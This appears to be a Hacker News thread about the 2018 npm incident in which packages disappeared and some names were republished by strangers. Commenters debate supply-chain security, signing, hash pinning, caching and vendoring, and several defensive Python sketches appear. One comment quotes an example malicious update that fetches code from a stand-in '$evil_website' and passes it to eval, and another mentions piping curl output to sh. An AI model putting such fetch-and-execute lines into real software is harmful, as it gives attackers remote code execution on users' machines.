I think the (short) answer is "node, npm, and javascript".
The longer answer has something to do with the automatic installation of dependencies, and the common use of shell scripts downloaded directly off the internet and executed using the developer's or sysadmin's user account.
I used to use CPAN all the time. CPAN would check dependencies for you, but if you didn't have them already you'd get a warning and you'd have to install them yourself. It forced you to be aware of what you're installing, and it applied some pressure on CPAN authors to not go too crazy with dependencies (since they were just as annoyed by the installation process as everyone else.)
These days I use NuGet a lot. It does the dependency installation for you, but it asks for permission first. The dialogs could be better about letting you learn about the dependencies before saying they're ok. (In general, NuGet's dialogs could be a lot better about package details.)
I think CPAN is pretty sweet for variety/wide reach of packages available, but this is flat-out wrong.
CPAN is not a package manager; it is a file sprayer/script runner with a goal of dependency installation. That's perfectly sufficient for a lot of use cases, but to me "package manager" means "program that manages packages of software on my system", not the equivalent of "curl cpan.org/whatever | sh".
CPAN packages can (and do by very common convention) spray files all over the place on the target system. Then, those files are usually not tracked in a central place, so packages can't be uninstalled, packages that clobber other packages' files can't be detected, and "where did this file come from?"-type questions cannot be answered.
Whether CPAN or NPM "force you to be aware of what you're installing" seems like the least significant difference between the tools. When NPM tells you "I installed package 'foo'", it almost always means that the only changes it made to your system were in the "node_modules/foo" folder, global or not. When CPAN tells you "I installed package 'foo'" it means "I ran an install script, which someone named 'foo', that might have done anything; hope that script gave you some verbose output and told you everything it was doing! Good luck removing/undoing its changes if you decide you don't want that package!"
There are ways around all of those issues with CPAN, and plenty of tools in Perl distribution utilities to address them, but they are far from universally taken advantage of. CPAN is extremely unlike, and often inferior to, NPM. Imagine if NPM packages did all of their installation logic inside a post-install hook; that's more like a CPAN distribution.
Whereas a lot of npm modules are relatively small - some tiny - and have their own dependencies. So a simple "npm install blah" command can result in dozens of packages being installed. Dealing with that manually would, in fairness, be a giant chore.
Now of course there's a discussion to be had about whether thousands of weeny little modules is a good idea or not but, to be honest, that's a religious debate I'd rather steer clear of.
CPAN has a setting that force-feeds you dependencies without asking, but I don't think it's on by default. Also, CPAN runs tests by default, which usually takes forever, so users get immediate feedback when packages go dependency-crazy. The modern Perl ecosystem is often stupidly dependency-heavy, but nothing like Node.
Fast forward to angular 2, and we're down to two developers who are still for it.
Fast forward to today, I'm down to one angular dev who's still for it, and two of the original three have left for react jobs. Meanwhile, I'm left with a bunch of angular 1 code that needs to be upgraded to angular 2, and a few testing-out-angular-2 projects that are dependency hell.
The only reason I ultimately embraced angular 1 to begin with (above reasons aside), was because it was so opinionated about everything, I could throw it at my weaker developers and say: "just learn the angular way to do it", and there was very little left they could meaningfully screw up. Angular proponents on the team would see it as a point of expertise to teach the "angular way" to more junior devs, and everyone left the day feeling good.
When it comes to JavaScript, 95% of the difficulty of writing good, maintainable code is ensuring that your team is all writing to a very exact and consistent quality and style, since there are so many different ways you can write JS, and so many potential pitfalls. And if the team all wants to embrace Google's Angular standard, that works for me. It's far easier to be able to point to an ecosystem with an explicit, opinionated way of writing code than it is to continuously train people on how to write maintainable code otherwise.
But with angular 2, if you haven't been drinking the Kool-Aid for a while now, it requires so much knowledge just to get running that I can't even have junior devs work on it without a senior dev who's also an angular fanboy there to make sure everything is set up to begin with. It's absurd. And I'm supposed to sell to the business that we need to migrate all my Angular 1 code to this monstrosity? And then spend time again every 6 months making the necessary upgrades to stay up to date? Get real.
Kidding - but we had exactly the same problem, except with a React app rather than an Angular one just before Christmas.
No joke with this statement though: every time we have a time-consuming build issue to deal with, it comes down to some npm dependency problem. Honestly, if there were a way we could realistically ditch npm (NO! YARN IS NOT ANY BETTER - to preempt that suggestion - it's simply an npm-a-like) I'd happily do so, but sadly there isn't.
Not sure why you’re stuck on the number of deps either - as long as they’re small who cares?
Other languages and package management systems don't encourage this kind of insanity.
This is not possible, you ask?
In fact, JS/CSS is the most viable of all the stacks to move forward. Let's use the "advantage" that any JS library/ecosystem dies fast, and put out enough hipster propaganda declaring the ultimate solution.
Is it too hard? JS is so bad that fixing it is easy. You only need more than the week it originally took to build it.
I think the software version of this is: any system with more structure than your program is an over-engineered monstrosity, and any system with less structure than your program is a flakey hack.
I don't use npm or node for anything serious, and I don't really have any knowledge of how NPM works, but this isn't the first time I've read this story of a whole bunch of packages disappearing and everybody's builds breaking. If everything is a house of cards, then why don't I hear the same stories about PyPI or gems or crates?
I really would love to ditch web dev and all its myriad tendrils, and go back to native desktop software.
Example: https://www.npmjs.com/package/duplexer3, which has 4M monthly downloads, just reappeared, published by a fresh npm user. They have published another two versions since then, so it's possible they initially republished the package unchanged, but are now messing with the code.
Previously the package belonged to someone else: https://webcache.googleusercontent.com/search?q=cache:oDbrgP...
I'm not saying it's a malicious attempt, but it might be, and it very much looks like one. Be cautious, as you might not notice if some packages your code depends on were republished with malicious code. It might take some time for NPM to sort this out and restore the original packages.
> duplexer3@1.0.1 install /Users/foo/Code/foo/node_modules/duplexer3
> echo "To every thing there is a season, and a time to every purpose under the heaven: A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted; A time to kill, and a time to heal; a time to break down, and a time to build up; A time to weep, and a time to laugh; a time to mourn, and a time to dance; A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing; A time to get, and a time to lose; a time to keep, and a time to cast away; A time to rend, and a time to sew; a time to keep silence, and a time to speak; A time to love, and a time to hate; a time of war, and a time of peace. A time to make use of duplexer3, and a time to be without duplexer3."
To every thing there is a season, and a time to every purpose under the heaven: A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted; A time to kill, and a time to heal; a time to break down, and a time to build up; A time to weep, and a time to laugh; a time to mourn, and a time to dance; A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing; A time to get, and a time to lose; a time to keep, and a time to cast away; A time to rend, and a time to sew; a time to keep silence, and a time to speak; A time to love, and a time to hate; a time of war, and a time of peace. A time to make use of duplexer3, and a time to be without duplexer3.
Given that there are hints, at least, that the problems were caused by some particular developer's actions, I wonder about the security model for package-managed platforms altogether now. If I were a big cybercrime ring, the first thing I'd do would be to get a bunch of thugs together and knock on the front door of a developer of a widely-used package: "help us launch [the sort of attack we're seeing here] or we'll [be very upset with you] with this wrench." Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
But your point about pressuring or bribing package authors still stands as a scary issue. Similar things have already happened: for example, Kite quietly buying code-editor plugins from their original authors and then adding code some consider spyware (see https://news.ycombinator.com/item?id=14902630). I believe there were cases where a similar thing happened with some Chrome extensions too...
Although, I've never considered this in the case of an actual attack. It would make sense to actually fingerprint the entire source tree and record this too somewhere, so when you build it you know you are getting the right thing. Teapot basically defers this to git.
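To make the "fingerprint the entire source tree" idea concrete, here is a minimal sketch. It is not how Teapot or git does it; the function name `fingerprint_tree` and the choice of SHA-256 are assumptions for illustration only. It hashes every relative path and file content in a deterministic order, so any changed, added, or removed file changes the result.

```python
import hashlib
import os


def fingerprint_tree(root: str) -> str:
    """Return a SHA-256 hex digest covering every file path and content under root.

    Hypothetical helper for illustration; not part of any package manager.
    """
    digest = hashlib.sha256()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # sort in place so the traversal order is deterministic
        for name in sorted(filenames):
            full_path = os.path.join(dirpath, name)
            rel_path = os.path.relpath(full_path, root).replace(os.sep, "/")
            with open(full_path, "rb") as handle:
                content = handle.read()
            # Length-prefix each field so two different trees cannot produce
            # the same byte stream just by shifting bytes between fields.
            for field in (rel_path.encode("utf-8"), content):
                digest.update(len(field).to_bytes(8, "big"))
                digest.update(field)
    return digest.hexdigest()
```

You would record the digest next to the dependency entry when you first vet it, and refuse to build if a later checkout produces a different one.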
The defense is staged deployment and active users. This obviously depends on the bluntness of the malicious code.
If I may assume easily noticed effects of the malicious code: A dev at our place - using java with maven - would update the library, his workstation would get owned. This could have impacts, but if we notice, we'd wipe that workstation, re-image from backup and get in contact with sonatype to kill that version. This version would never touch staging, the last step before prod.
If we don't notice on the workstation, there's a good chance we or our IDS would notice trouble either on our testing servers or our staging servers, since especially staging is similar to prod and subject to load tests similar to prod load. Once we're there, it's back to bug reports with the library and contact with sonatype to handle that version.
If we can't notice the malicious code at all due to really, really smart activation mechanisms... well, then we're in NSA conspiracy land again.
EDIT: That would be a massive security problem!
long discussion here: https://github.com/node-forward/discussions/issues/29
If you're going to have clients specify a signature anyway, then you don't need to sign packages; you just need a strong one-way hash function, like SHA-256 or SHA-512. The user executes "pkg-mgr install [package name] ae36f862..."
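A rough sketch of what hash-pinned installation could look like on the client side. Everything here is hypothetical: `pkg-mgr` is not a real tool, `verify_package` and `install` are made-up names, and SHA-256 is an assumed choice of hash. The point is only that the client refuses any archive whose digest differs from the one the user supplied.

```python
import hashlib
import hmac


def verify_package(archive: bytes, expected_sha256_hex: str) -> bool:
    """Check the downloaded archive against the digest the user pinned."""
    actual = hashlib.sha256(archive).hexdigest()
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


def install(name: str, archive: bytes, expected_sha256_hex: str) -> str:
    """Pretend installer: only proceeds when the content hash matches."""
    if not verify_package(archive, expected_sha256_hex):
        raise ValueError(f"hash mismatch for {name}: refusing to install")
    return f"installed {name}"
```

With this scheme a republished package under the same name fails the check unless its bytes are identical, which is exactly the takeover case being discussed.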
Either way, every tutorial using npm will become invalid.
> Once you've yanked all versions of a gem, anyone can push onto that same gem namespace and effectively take it over. This way, we kind of automate the process of taking over old gem namespaces.
This isn't a standard practice in the JS world?
It might not be as standard a practice in the Java world as you think.
Relying on npm, Atlassian/GitHub, etc. really hurts when stuff like this happens. Issues always get resolved, but cases such as the GitLab incident should be enough to always keep some local copies around.
Granted, we do depend on bitbucket. However, I am honestly scared to self-host our code. This is a small but old shop, so the entire code base is easily several million dollars worth in man-hours alone. And then again, it's git, so if push comes to shove, we could easily and quickly spin up an internal gitlab instance and push our stuff there to get back up.
Install an instance of Sonatype Nexus, create a proxy-repo for npm (and Maven if you also use Java) and that's it.
What, however, won't be caught is Docker (because that crap insists on directly talking to the Dockerhub servers, which is a giant security hole waiting to happen) and PHP composer (because it likes to pull dependencies via git from GH, so no caching there).
You also can require image signing such that if an image is signed by an untrusted party it will fail.
At some point you have to trust a third party. Even if you run your own hardware, you still depend on power and internet provided by someone else. And unless you are a massive company, time is typically spent much better on other things than hosting your own NPM packages and git repos.
I don't think there is any part of my little software empire that is dependent on code for which I don't have the source or underlying .dll checked into source control.
It's part of your project. You absolutely need a copy of it.
These are building blocks in a normal dev environment, and it would take me massive amounts of time to manage everything on my own.
The local copies are fragile and not as easily shared.
Having a redundant array of independent cloud providers seems the ideal state. This is the most effective way to provide a single source of truth without it becoming a single point of failure.
Even if the answer is “yes, 1+ packages were hijacked by not-the-original author, but we’re still investigating if there was malware”, tell people immediately. Don’t wait a few days for your investigation and post mortem if it’s possible that some users’ systems have already been compromised.
@seldo, I understand that you don't want to disseminate misleading info, but an abundance of caution seems warranted in this case as my understanding of the incident lines up with what @yashap has said. If we're wrong, straighten us out --- if we're not, please sound an advisory, because this is major.
Yarn (which is an alternative to npm) uses a global cache [1] on your machine which speeds things up, but probably also protects you from immediate problems in cases like the one currently in progress (because you would probably have a local copy of e.g. require-from-string available).
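To illustrate why a local cache shields you from a registry outage, here is a small cache-first lookup. This is not Yarn's actual implementation; `fetch_package`, the `name-version.tgz` file layout, and the `download` callback are all assumptions made for the sketch, and it only handles unscoped package names.

```python
import os
from typing import Callable


def fetch_package(name: str, version: str, cache_dir: str,
                  download: Callable[[str, str], bytes]) -> bytes:
    """Return the archive from the local cache, hitting the network only on a miss."""
    cached_path = os.path.join(cache_dir, f"{name}-{version}.tgz")
    if os.path.exists(cached_path):
        # Cache hit: the registry is never contacted, so it may be down or altered.
        with open(cached_path, "rb") as handle:
            return handle.read()
    data = download(name, version)  # cache miss: this is the only network access
    os.makedirs(cache_dir, exist_ok=True)
    with open(cached_path, "wb") as handle:
        handle.write(data)
    return data
```

Once a version has been fetched a single time, later installs keep working even if the package vanishes upstream, which is the behaviour described above.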
A major reason for the high tool churn in that ecosystem is how many of those tools are not designed from the ground up, don't quite solve the things they ought to, or solve them in really weird ways (partly due to the low barrier to entry). But that doesn't mean all of it deserves that label.
Do you also insist that Chrome and Firefox shouldn't exist because IE does the job adequately?
Packages that are published should be immutable, just like in the Maven repo case.
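As a toy model of what "immutable" means here (this is not Maven Central's or npm's code; the class and method names are invented for illustration): a name/version pair can be written once, never overwritten, and there is simply no delete operation.

```python
from typing import Dict, Tuple


class ImmutableRegistry:
    """In-memory sketch of a write-once package registry (hypothetical)."""

    def __init__(self) -> None:
        self._archives: Dict[Tuple[str, str], bytes] = {}

    def publish(self, name: str, version: str, archive: bytes) -> None:
        key = (name, version)
        if key in self._archives:
            # Republishing an existing version is rejected, even by the author.
            raise ValueError(f"{name}@{version} already exists and cannot be replaced")
        self._archives[key] = archive

    def fetch(self, name: str, version: str) -> bytes:
        return self._archives[(name, version)]

    # Deliberately no unpublish/delete method: published versions stay available.
```

A fix then always ships as a new version number, so anything pinned to an old version keeps resolving to the same bytes.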
Then it happened again not two months after left-pad. And now it happened again.
http://blog.npmjs.org/post/168978377570/new-package-moniker-...
Other than that, their reaction to similar incidents was to wait for somebody on Twitter to notify them, ban the responsible users, and hope that it won't happen again. It's still extremely exploitable, and there are surely many other novel ways of installing malware using the repository that we haven't even heard of yet. The NPM security team is slow to act and sadly doesn't think ahead. They're responsible for one of the largest software ecosystems in the world; they should step up their game.
In my company we take the stable version of the library we want to use and we self-host it. We basically have added a cache that we manage and control what goes into it instead of just trusting a manager. Especially for server-side deployment this is mandatory for security. Things like let's say ffmpeg etc - we never get from random packages but we host them ourselves.
"Harvesting credit card numbers and passwords from websites"
https://news.ycombinator.com/item?id=16084575
If you self-host a stable version, you'll have some time to hear about potential problems in a new version before updating it.
I share your concern. It's a tradeoff: tools that do this are very convenient, and the people who have thought about it have decided in some cases that convenience outweighs the security or stability aspects. And people can make that determination on a case-by-case basis.
Bleeding-edge packages from possibly compromised hosts, or self-hosted old versions with potential bugs, security issues, and hard-to-find documentation.
Pick your poison, unless you're Red Hat and can spend the time to backport security/bug fixes and maintain a knowledge base for your old versions.
There are multiple ways to mitigate the risk, but committing libraries into source control can cause way more headaches than it prevents IMO.
There are advantages to checking in all your deps, but many drawbacks as well (especially for an interpreted language; something like Go avoids a few of these):
- Incredibly slow SCM operations unless you use the perfect options every time (good luck, new devs). I've experienced this with Perforce and Git, and hoo boy does a "get three cups of coffee while you wait"-time diff/commit operation throw a hitch in your plans.
- You need either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read when you update stuff.
- Actually understanding the diffs you read when packages get updated. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
- Hassles with regards to compiled dependencies. You have to filter them out of source control (can be a hassle to find all the places they live), or remember to rebuild when changing OS versions/stdlib versions/runtime versions/architectures/etc. That can get pretty annoying, especially since in my experience each "runtime loaded" compiled dependency gives you many completely different, utterly unintelligible errors when it's used in an environment where it should be rebuilt.
It is better to use content hashes and a system that distributes and enforces these, like IPFS.
Someone could just create some hooks for https://github.com/whyrusleeping/gx and we would have it done.
There are lots of other structures that work like this. Git is one - when git fetches a branch, git will check whether the remote branch includes all the commits it saw last time it fetched, or some are missing. (By default this is non-fatal but tends to produce warnings/errors when you try to actually use the replaced branch, but you can easily make this fatal.) Another good one is the style of Merkle trees used in Certificate Transparency: there's no proof-of-work, so the trees are small, but they still include a cryptographic hash of each previous tree so you can detect if something has gone missing.
The other relevant property of the blockchain is that it's not a reference to data elsewhere; it (like git) actually contains all the data that's ever been on the blockchain, and you need that data to verify the blockchain properly. This may or may not be what you want for a programming language package manager; it means that in order to set up a new development environment, you have to download every version of every npm package that ever existed. It does accomplish the goal of preventing things from being removed, but it's pretty heavy-weight.
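The "each entry includes a hash of what came before, so you can detect if something has gone missing" property doesn't need proof-of-work or a full Merkle tree to demonstrate. Below is a deliberately simplified hash chain; it is not Certificate Transparency's or git's actual data structure, and all names (`append`, `verify`, `still_contains`) are made up for the sketch.

```python
import hashlib
from typing import List, Tuple

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry

Log = List[Tuple[str, str]]  # (payload, chained hash) pairs


def entry_hash(prev_hash: str, payload: str) -> str:
    """Hash a payload together with the hash of the entry before it."""
    return hashlib.sha256((prev_hash + "\n" + payload).encode("utf-8")).hexdigest()


def append(log: Log, payload: str) -> None:
    prev_hash = log[-1][1] if log else GENESIS
    log.append((payload, entry_hash(prev_hash, payload)))


def verify(log: Log) -> bool:
    """Recompute the chain; removing or editing an earlier entry breaks it."""
    prev_hash = GENESIS
    for payload, stored_hash in log:
        if entry_hash(prev_hash, payload) != stored_hash:
            return False
        prev_hash = stored_hash
    return True


def still_contains(log: Log, previously_seen_head: str) -> bool:
    """Client-side check: is the head we saw last time still part of the log?"""
    return any(stored_hash == previously_seen_head for _, stored_hash in log)
```

A client that remembers the last head hash it saw can run `verify` plus `still_contains` on the next fetch, which is roughly the "did the remote drop commits I already saw?" check, and it only needs the hashes rather than every package ever published.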
> Beginning at 18:36 GMT today, 106 packages were made unavailable from the registry. 97 of them were restored immediately. Unfortunately, people published over 9 of them, causing delays in the restoration of those 9. We are continuing to clean up the overpublications. All installations that depend on the 106 packages should now be working.
Hard to believe less than a hundred packages cause so many issues. NPM's dependency hierarchy is pretty insane.
Ever heard of glibc?
Unfortunately with NPM this is still awkward, because as soon as you try to shrinkwrap your project, it doesn't just pin the version numbers, it also pins the full source location. That's in direct conflict with (and apparently takes precedence over) using one of the local caching proxies that would otherwise be a useful practical solution to this problem, and the situation gets even more complicated if you have people building at multiple locations and want each to have their own proxy.
Yarn seems to have a better approach to this. It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options (IMHO a mistake since the big selling point of Yarn is its deterministic, reproducible behaviour) but at least you can do something resembling a local cache combined with something resembling version pinning, which is the ante for any sane build system.
https://github.com/npm/registry/issues/255
Be part of the history :)
EDIT: there are now over 1100 comments/memes.
... Or it did. I received a harshly worded letter from npm saying they axed it. It hit all the talking points about inclusiveness and making sure no one feels even slightly annoyed.
Meh. No point to this story. Just an interesting situation with an inconsistently curated package manager. I was surprised there was an unofficial undocumented banlist.
https://www.npmjs.com/policies/conduct
I guess lots of people will think that a policy like "Avoid using offensive or harassing package names, nicknames, or other identifiers that might detract from a friendly, safe, and welcoming environment for all." stifles their inner something or other though.
If they take down the Nazí one but not the Fabiano one, you can then take your mischief making to the next level by accusing them of being misogynists for banning a package promoting a woman chess champion but leaving up the one for the man.
> We made history! Fastest issue to reach 1000 comments, in just 2 hours.
> cheers everyone, nice chatting with you. 17 away from hitting 1000 btw!
> Is GitHub going to die with the volume of comments?
Kind of disappointed the NPM community is turning github into reddit right now.
There is currently no way for a user to remove or unpublish their own packages through the public NPM API anymore (a change following the `left-pad` incident).
This leads me to believe this was an internal NPM error. My guess is employee error.
Yeah, it definitely exists: https://docs.npmjs.com/cli/unpublish
A quote from the documentation page you linked:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
Store all of your dependencies locally.
If something disappears then at least you can continue until you find a replacement.
It seems to me that if packages "disappear" from upstream, it shouldn't have any effect other than preventing an update due to the missing dependency.
- The missing packages can be replaced by someone who wasn't the original package author (e.g. a malicious hacker)
- It's not easy to catch this ^^^ because NPM doesn't have support for signing versions in your project's dependency configuration... (I bet it will after this.)
- Almost every modern website has a dependency on NPM somewhere in their build chain
- NPM being down means loads of sites can't deploy properly
So yeah. This may be a really big deal.
They should take a good hard look at NuGet, which does not allow packages to be deleted so builds are guaranteed to be reliable. Still doesn't hurt to locally cache packages with software such as Klondike.
http://blog.npmjs.org/post/169432444640/npm-operational-inci...
TL;DR: "no malicious actors were involved in yesterday’s incident, and the security of npm users’ accounts and the integrity of these 106 packages were never jeopardized."
A more detailed report will follow in the next days.
https://github.com/mohsen1/json-formatter-js/pull/58#issueco...
This wouldn't fix the issue of someone deleting the actual package (this happened here?), but it would prevent some malicious code being installed if someone uses the same package name.
Edit: grammar
Which means that it's not a technical difference. Maybe Central has been compromised/had issues before, just long ago (it's certainly much older). Maybe there are things wrong with NPM-as-a-company even if NPM-as-a-technology is fine. Maybe it's just luck.
But "stays there until nuclear fire immolates the Earth" sounds a bit much like "this ship is completely unsinkable" for my liking.
Kind of funny how shitty modern technology is. But I heard a quote recently that kind of explains it: "The more sophisticated something is, the easier it is to break it."
What are the open-source / self-hosting options here? It gets a little messy with all the sub-dependencies, doesn't it?
NPM already allows using git repos, but needs some tweaks to allow better support:
* allow versioning via git tags
* store git commit in `package-lock.json`.
* maybe something else...
You can reference commits in package.json already.
From [1]:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
I am kinda assuming that if npm support were to help you unpublish a package that is depended upon (they might refuse), they would prevent someone else from re-publishing to that name (they might put up their own placeholder package, like they did during the left-pad incident), but granted I can't find this stated anywhere.
I think the reason re-publishing seemed to happen in this case was they weren't prepared for whatever vector allowed for the deletion of these packages.
http://blog.npmjs.org/post/163723642530/crossenv-malware-on-...
I can't even install webpack-dev-server. Because this package is missing.
EDIT: it's back
[1]: https://stackoverflow.com/questions/48131550/nodemon-install...
I think npm has been a headache for everyone at some point, which is one of the main reasons I started contributing to Yarn. I think npm has done a lot of good work in the past year to respond to the necessary change, so kudos to them for their work; however, it's nowhere near the rock-solid package manager that we need. If the Javascript ecosystem is to ever be taken seriously, and not as a toy -- it has to have more reliability.
Ergonomically, I currently think it's ahead of many other package managers because of how simple it is to get running. The number of gotchas after npm install is nothing to sneeze at, though.
One of the things you can do to get builds that aren't as susceptible to npm registry issues is configuring an offline mirror [1].
From the post:
"Repeatable and reliable builds for large JavaScript projects are vital. If your builds depend on dependencies being downloaded from network, this build system is neither repeatable nor reliable.
One of the main advantages of Yarn is that it can install node_modules from files located in file system. We call it “Offline Mirror” because it mirrors the files downloaded from registry during the first build and stores them locally for future builds."
- https://github.com/elsehow/gx-js
- https://github.com/ipmjs/ipmjs
Node.js package manager SHOULD BE COMMUNITY OWNED/DRIVEN
You should also not be cowboy updating things just because there is an update.
1. Allow a single package file, including multiple clauses (or sub-files, whatever) for different languages. Let me manage my Angular front-end and Flask back-end in the same file. A single CLI tool as well - Composer and Bower aren't all that different.
2. Be the trusted broker, with e.g. MD5 checking, virus scanning, some kind of certification/badging/web of trust thing. Let developers know if it's listed, it's been vetted in some way.
3. Allow client-side caching, but also act as a cache/proxy fetch for package retrieval. That way, if Github or source site is down, the Internet doesn't come to a screeching halt. I see the value of Satis, but it's a whole additional tool to solve just one part of this one problem.
4. Server-side dependency solver. Cache the requests and give instant answers for similar requests. All sorts of value-adds in analytics here, made more valuable by crossing language boundaries.
5. Act as an advocate for good semver, as part of the vetting above.
NOTE: These features are not all-or-nothing, I believe there's value from implementing each one on its own. Also note that nothing here should lock people into one provider for these services. There's a market to be made here.
http://magarshak.com/blog/?tag=identity
Well, Q allows you to choose between “each individual publishes their own stream” and some degree of “centralized publishing” by management teams of groups. So who should publish a stream, the individual or the group?
If the individual - the risk is that the individual may have too much power over others who come to rely on the stream. They may suddenly stop publishing it, or cut off access to everyone, which would hurt many people. (I define hurt in terms of needs or strong expectations of people that form over time.)
If the group - then managers may come and go, but the risk is that if the group is too big, it may be out of touch with the individuals. The bigger risk is that the individuals are forced to go along with the group, which may also create a lot of frustration. For instance, the group may split into three sub-groups. They are deciding where to go, but some people want to go bowling, others want to go to the movies, others want to volunteer in a soup kitchen, even though everyone belongs to the group. Who should publish these activities?
So I think when it comes to publishing streams that others can join, there should be some combination of groups and individuals. And it should reflect the best practices of what happens in the real world: one person starts a group that may later become bigger than him. Then this group grows, gets managers etc. After a while this person may leave. In the future, other individuals may want to start their own groups and invite some members of the old group to join. They may establish relationships between each other, subscribe to each other’s streams, pay each other money, etc.
See https://github.com/npm/registry/issues/255 for details.
Very annoying, breaks builds all over, also prevents installing react-native.
If this was only a matter of missing packages, this would "only" be a matter of breaking builds.
But it looks like third parties were able to take over the missing packages, see https://github.com/npm/registry/issues/256 - which is a HUGE deal, considering "npm install" blindly executes the scripts in a package's preinstall property (as well as the packaged module itself possibly containing arbitrary backdoors)
The caret syntax for auto-upgrading to the next minor version is the open door to a world of bullshit.
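For anyone unsure what the caret actually lets through, here is a simplified model of caret ranges as I understand them from npm's semver rules: `^1.2.3` accepts anything from 1.2.3 up to (not including) 2.0.0, `^0.2.3` stops before 0.3.0, and `^0.0.3` stops before 0.0.4. This sketch ignores prerelease and build tags, and the helper names are my own, not the `semver` library's API.

```python
from typing import Tuple

Version = Tuple[int, int, int]


def parse(version: str) -> Version:
    """Parse a plain MAJOR.MINOR.PATCH string (no prerelease/build metadata)."""
    major, minor, patch = (int(part) for part in version.split("."))
    return (major, minor, patch)


def caret_upper_bound(base: Version) -> Version:
    """Exclusive upper bound: bump the left-most non-zero component."""
    major, minor, patch = base
    if major > 0:
        return (major + 1, 0, 0)
    if minor > 0:
        return (0, minor + 1, 0)
    return (0, 0, patch + 1)


def satisfies_caret(candidate: str, base: str) -> bool:
    """True if `candidate` would be accepted for a dependency declared as ^base."""
    low = parse(base)
    return low <= parse(candidate) < caret_upper_bound(low)
```

So with `"foo": "^1.2.3"` in package.json and no lock file, a fresh install can silently pick up 1.9.0 the day it is published, which is the door being complained about.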
Vendor the dependencies that are needed to build and run your applications. Period.
What an ecosystem we have built.
I wish I'd taken his advice as there are a couple of JAR files that I can no longer update.
HN: Shrinkpack – npm dependencies as tarballs, prevents “left-pad” style breakage - https://news.ycombinator.com/item?id=11353908
Wonder if npm, Inc. would view a decentralized registry as a threat to their business model?
https://github.com/npm/registry/issues/255#issuecomment-3557...
It defeats the entire purpose of using a public repository.